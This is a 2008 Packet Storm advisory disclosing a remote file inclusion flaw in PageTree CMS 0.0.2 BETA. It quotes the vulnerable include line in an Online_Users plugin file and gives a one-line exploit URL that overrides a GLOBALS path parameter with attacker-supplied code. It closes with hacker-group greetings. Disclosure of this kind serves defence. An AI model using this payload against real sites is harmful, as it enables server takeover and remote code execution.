pagetreecms-rfi.txt

2008-11-29T00:00:00
ID PACKETSTORM:72395
Type packetstorm
Reporter NoGe
Modified 2008-11-29T00:00:00

Description

                                        
                                            `=============================================================================================================  
  
  
[o] PageTree CMS 0.0.2 BETA 0001 Remote File Inclusion Vulnerability  
  
Software : PageTree CMS version 0.0.2 BETA 0001  
Vendor : http://pagetreecms.co.cc/  
Download : http://pagetree.googlecode.com/svn/trunk/  
Author : NoGe  
Contact : noge[dot]code[at]gmail[dot]com  
Blog : http://evilc0de.blogspot.com  
  
  
=============================================================================================================  
  
  
[o] Vulnerable file  
  
admin/plugins/Online_Users/main.php  
  
include($GLOBALS['PT_Config']['dir']['data']."content/1.php");  
  
  
  
[o] Exploit  
  
http://localhost/[path]/admin/plugins/Online_Users/main.php?GLOBALS[PT_Config][dir][data]=[evilcode]  
  
  
=============================================================================================================  
  
  
[o] Greetz  
  
MainHack BrotherHood [ http://serverisdown.org/blog/]  
Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa  
H312Y yooogy mousekill }^-^{ kaka11 martfella  
skulmatic olibekas ulga Cungkee k1tk4t str0ke  
  
GANYANG MALINGSIAL!!! [ http://malingsial.serverisdown.org/ ]  
  
  
=============================================================================================================  
  
`